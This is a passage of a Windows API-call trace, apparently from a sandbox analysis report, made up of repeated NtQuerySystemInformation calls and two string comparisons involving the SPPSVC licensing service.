ResultLength=0x0) [0273.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0273.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0273.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0273.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0273.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0273.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0273.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0273.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0273.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0273.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd010, Length=0x20, ResultLength=0x0) [0273.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0273.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0273.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0273.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0273.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0273.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0273.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0273.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0273.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0273.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0273.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0273.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0273.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0273.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0273.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0273.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0273.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0273.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0273.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0273.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0273.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0273.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0273.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0273.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0273.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0273.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0273.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0273.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0273.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0273.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdc0, Length=0x28, ResultLength=0x0) [0273.699] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0273.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0273.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x28, ResultLength=0x0) [0273.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0273.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0273.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x20, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0273.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0273.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0273.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0273.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x40, ResultLength=0x0) [0273.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0273.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0273.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0273.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0273.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf8, Length=0x30, ResultLength=0x0) [0273.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x38, ResultLength=0x0) [0273.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0273.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0273.724] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", 